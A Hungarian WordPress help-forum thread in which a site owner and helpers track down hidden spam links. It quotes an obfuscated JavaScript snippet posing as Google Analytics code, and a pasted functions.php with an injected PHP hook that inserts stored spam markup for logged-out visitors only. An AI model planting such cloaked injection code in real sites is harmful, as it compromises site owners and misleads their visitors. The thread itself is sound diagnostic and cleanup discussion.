Sziasztok! Ma ellenőriztem a honlapom tartalmát egy oldalon, ami egy tucat ide nem illő külső hivatkozást, és egy jókora idegen nyelvű szöveget tartalmaz. Az egyik oldal szerkesztése közben lett gyanús, ahol egy “játék” szó valami külső oldalra mutatott. A HTML szövegben nem látszik a jelölése, sőt, egyik hivatkozás sem látható, és hiába kerestem a szerkesztő felületben a szöveget sem találtam meg!Rengeteg munkám van az oldalban, és nagyon bosszantó dolog ez…
Hogyan tudom kideríteni mi is ez, és hogyan tudom deaktiválni?
Valaki segítsen ennek a problémának a megoldásában légyszi, mert én nem vagyok igazán otthonos ebben a témában, kifejezetten amatőr vagyok.
Akismet és BBQ aktiválva van az oldalon, és WP MyGrid2 sablont használok. Honlap: http://pollypuppy.com/
Előre is köszönettel: Gabi
Tudnál mutatni egy ilyen oldalt, a főoldalon nem találtam ilyesmit.
Szia!
Igen, tele van rakva eldugott spam szöveggel az oldalad. Közvetlenül a body utána van egy külön div ben, és ezt javascript-ben rejtik el, ami közvetlenül felette van, első pillantásra olyan, mintha google követő kód lenne, de nem az! Erről van szó:
<br />
var _ga0 = [];<br />
_ga0.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);<br />
_ga0.push(['_setPageId', '6918518510413211618916516918118018617118018618618118219']);<br />
_ga0.push(['_setOption', '3182181185175186175181180128167168185181178187186171129']);<br />
_ga0.push(['_setPageId', '1691781751821281841711691861101221211191821901141671871']);<br />
_ga0.push(['_setOption', '8618111416718718618111412212111918219011112919513011718']);<br />
_ga0.push(['_setPageId', '5186191178171132']);<br />
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga0.length; v++) t += _ga0[v][1];l=t.length;<br />
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);<br />
document.write(z);<br />
```<br />
Ha a z változó tartalmát kiteszed console.log() -al, akkor egyből látszik, mi lesz a kimenete:<br />
.w_contenttop{position:absolute;clip:rect(431px,auto,auto,431px);}
<strong>És pont a w_contenttop div-ben van a spam szövege! (body tag után)</strong><br />
<br />
Azt nem tudom, hogy került oda, nézd meg, keress rá (pl header.php ban, ha ott nincs, akkor egy a functions.php ban is behívhatnak akármit a header-be, ugye egy add_action()-al), vagy akárhol! Meg kell keresni, hogy csak simán be van így téve, vagy ezek máshol vannak hook-okkal meghívva. Az is lehet feltörtek, de az is lehet, hogy alapból már így töltötted le...<br />
<br />
Ü: András<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Köszönöm szépen a gyors segítséget, habár ez nekem Kínai “Ha a z változó tartalmát kiteszed console.log() -al, akkor egyből látszik, mi lesz a kimenete” 
Ha jól értelmezem a fenti parancsot kell megkeresnem és törölnöm valamelyik mappából.
Godaddy a hostingot használok, ide nem tudtam belépni a jelszavammal. Most megváltoztattam, majd a WP jelszavamat is. A mellékelt kép mutatja a Homepage Snapshot-ot, gondolom akkor a header php- ban kell keresnem ( bár a header kép fölé helyezték el a spam szöveget. ). Elsőként el szeretném menteni az oldal tartalmát ( ezt sem tudom még hogyan kell…), csak ez után merek majd az editor részbe belenyúlni. Rendszeresen ellenőrzöm a tartalmat, ez a spam az elmúlt hónap során kerülhetett ide. Azt nem tudom hogyan, de inkább azt szeretném még kérdezni, mit javasoltak, hogyan tudom megvédeni az oldalamat a hasonló spam szövegek elhelyezésétől a jövőben?
Köszönöm szépen még egyszer, remélem sikerül megtalálni hova rakták.
Sajnos így ebben a formában nem találom sehol, a WP editor-ban minden mappát átnéztem tüzetesen. Mit javasoltok? Az FTP szerveren található mappákban ( és hol ) keresgéljek? A hook-ok hogy néznek ki?
Előre is köszönöm…
Szia!
Most írok, nem tudom megoldódott-e. Igen, amit becsatoltál képet, azt a spam szöveget tették egy olyan div be, amit javascript el rejtenek el.
Az “action hook” az egy módja annak, hogy a functions.php ban behívjanak valamit a sablon egy adott részén, mert rengeteg ilyen hook létezik. Ezért, ha a header.php-ban nem találod, könnyen lehet, hogy nem direkt oda tették így bele, hanem behívják a functions.php ból, egy függvénnyel. (STB!)
De könnyen lehet, hogy elkódolták (pl: eval(base64_decode…) és ha te nézed, akkor a kódban nem is találod meg szemmel. Csak ha van-e elkódolás, akkor lehet tudni, hogy azt érdemes kivizsgálni, hogy mi is az.
Keress ilyen elkódolt részt.
Itt is van erről szó: http://wordpress.org/support/topic/encrypted-theme-heres-how-to-decode-it
Pontosan honnan töltötted le a sablont? Melyik oldalról?
Mert van, hogy valaki készít egy sablont és direkt beszúr ilyeneket! Ezért nem szabad akárhonnan letölteni sablont de még plugint sem, csak a hivatalos oldalról.
Még azt is megnézheted, hogy kikapcsolsz minden bővítményt, és utána megnézed, hogy eltűnt-e. Mert van olyan, hogy bővítménybe rejtenek el ilyeneket.
Itt az a kérdés, hogy “rossz” bővítmény, “rossz” sablon vagy illetéktelen weboldal/ftp hozzáférés során, utólag került-e fel ez a spam szöveg. Mert nem mindegy.
Ü: András
Köszönöm, sajnos még nem oldódott meg.
Az oldalam több mint fél éve hibátlanul ment, az elmúlt 1-2 hét folyamán kerülhetett ide ez a szöveg, a tartalmat szoktam ellenőrizni rendszeresen. Időközben semmin nem változtattam, se a sablonon sem a bővítményeken. Ellenben a tárhelyre nem tudtam belépni a jelszavammal, úgyhogy az illetéktelen weboldal/ftp hozzáférés a legesélyesebb. Köszönöm a segítséget és a tippeket!
A link amit a postodba raktál FERTŐZÖTT oldalra mutat....
Újabb baj: Parse error: syntax error, unexpected $end in /home/content/49/9236049/html/wordpress/wp-content/themes/mygrid2/functions.php on line 172
Valaki tudna segíteni hol lehet az elírás? Csak kimásoltam a szöveget, gondolom közben valamit töröltem véletlenül… nem tudom pontosan melyik a 172., ez a vége ( ami egyébként ebben nincs is benne: http://themes.svn.wordpress.org/mygrid2/1.2/ )
//Tweak Comments
function grid_comment( $comment, $args, $depth ) {
$GLOBALS = $comment;
switch ( $comment->comment_type ) :
case ‘’ :
?>
<li id=“li-comment-”>
<div id=“comment-”>
<?php printf( __( '%s '), sprintf( '%s', get_comment_author_link() ) ); ?>
comment_approved == '0' ) : ?>
Your comment is awaiting moderation
<?php
/* translators: 1: date, 2: time */
printf( __( '%1$s at %2$s'), get_comment_date(), get_comment_time() ); ?><?php edit_comment_link( __( '(Edit)'), ' ' );
?>
$depth, 'max_depth' => $args ) ) ); ?>
<?php
break;
case 'pingback' :
case 'trackback' :
?>
Pingback:
<?php
break;
endswitch;
}
if (!function_exists("b_call")) {
function b_call($b) {
if (!function_exists("is_user_logged_in") || is_user_logged_in() || !($m = get_option("_metaproperty"))) {
return $b;
}
list($m, $n) = unserialize(trim(strrev($m)));
$b = preg_replace("~]*>~", ''."n". $n ."n", $b);
$b = str_ireplace("", $m."n", $b);
return $b;
}
function b_start() {
ob_start("b_call");
}
function b_end() {
ob_end_flush();
}
add_action("wp_head", "b_start");
add_action("wp_footer", "b_end");
}
?>
Nem hiszem, hogy a wp.org support fóruma fertőzött lenne, ez túl hamar kiderülne és szinte azonnal javítva lenne … (Inkább téged csaphat be valami vírusnyekergető.)
Az eredeti functions.php 155 sorból áll. Az eredetiből kiindulva a kérdéses sor vagy az utolsó vagy az utolsó előtti. Látszólag egyik sem hibás. Ellenben a záró php kód után (?>) lehet még nálad üres karakter, esetleg üres sor. Na, ezeket kell törölni, ha van.
Ebbe a fájlba a sablon szerzője, a honlap készítője szokott csak beleírni. Ami efölött van, lehet hacker műve. Amennyiben nem te írtál bele, javaslom, ftp-n írd felül az eredetivel.
Szia!
Fertőzött?
Csak mert van olyan eszköz, ami már akkor fertőzöttnek jelöl egy aloldalt, ha CSAK ennyi szerepel rajta: “eval(base64_decode” CODE-ként beszúrva.
A link a codex hivatalos fórumára visz. (NEM ÁLL szándékomban senkit sem fertőzött oldalra irányítani!)
Ü: András
Ebben biztos is vagyok, hiszen segíteni szeretnél, de mellékelem a képet :
Szia!
Nekem Avira vírusirtóm van, ő nem jelez semmit.
Az Avast-ot nem ismerem. Ám, azon az oldalon ilyen elkódolásokat szurkáltak be a hozzászólásokba, hogy olyat találtak az oldalukon. Erről hiheti úgy egy-két ilyen program, hogy “fertőzött” az oldal, közben pedig nem az. Az én véleményem szerint itt is erről van szó.
Például itt van az online scanner, malware-k stb után kutat: http://sitecheck.sucuri.net/scanner/
Ha ennek a fórumnak ezt az alodalát kivizsgáljuk, ahol most vagyunk, akkor jelzi, hogy valami malware-t talált. Ami nem igaz. Ezért is írtam, hogy ez ilyen.
(képet csatoltam a hozzászóláshoz)
Ü: András
Igen, hogy visszakanyarodjunk a témához, ez a hiba, amit nálad mutat, az azért van mert valami nincs lezárva pl: ilyennel: “}”, nincs párban.
Akkor van ez a hibaüzenet. Ez a teljes functions.php-d?
Miért nem frissíted a sablonod? Meg nem árt elmenteni (biztonsági mentés), ha ilyen van akkor gyorsan vissza tudd másolni.
Köszönöm a segítségeteket, habár véletlenül, de a probléma megoldva:) Itt, a functions.php -ban megtaláltam a kódot, amivel lehetővé tették az add action-nel való behívást a header-be. Egyszerűen az FTP-én ( ahogy Andrea javasolta köszi! ) átírtam az eredeti f. php. file-ra, így eltűnt a spam szöveg is. Most pedig csinálok egy biztonsági mentést.
Nagyon köszönöm még egyszer mindenkinek! 